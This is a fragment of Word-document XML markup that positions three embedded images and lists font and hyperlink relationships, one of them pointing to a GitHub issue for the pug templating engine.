          <wp:wrapNone/>
          <wp:docPr id="1"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3011182" cy="2483247"/>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828675</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>6647498</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="2538175" cy="2187692"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="2" name="image2.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image2.png"/>
                  <pic:cNvPicPr preferRelativeResize="0"/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId3"/>
                  <a:srcRect b="0" l="0" r="0" t="0"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="2538175" cy="218769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76201</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>2525648</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="2700338" cy="2231285"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr id="3" name="image3.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image3.png"/>
                  <pic:cNvPicPr preferRelativeResize="0"/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId4"/>
                  <a:srcRect b="0" l="0" r="0" t="0"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="2700338" cy="223128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66666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hyperlink" Target="https://github.com/pugjs/pug/issues/331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PlayfairDisplay-regular.ttf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/PlayfairDisplay-bold.ttf"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Comfortaa-regular.ttf"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Lato-boldItalic.ttf"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Comfortaa-bold.ttf"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Lato-italic.ttf"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/PlayfairDisplay-italic.ttf"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/PlayfairDisplay-boldItalic.ttf"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Lato-regular.ttf"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Lato-bold.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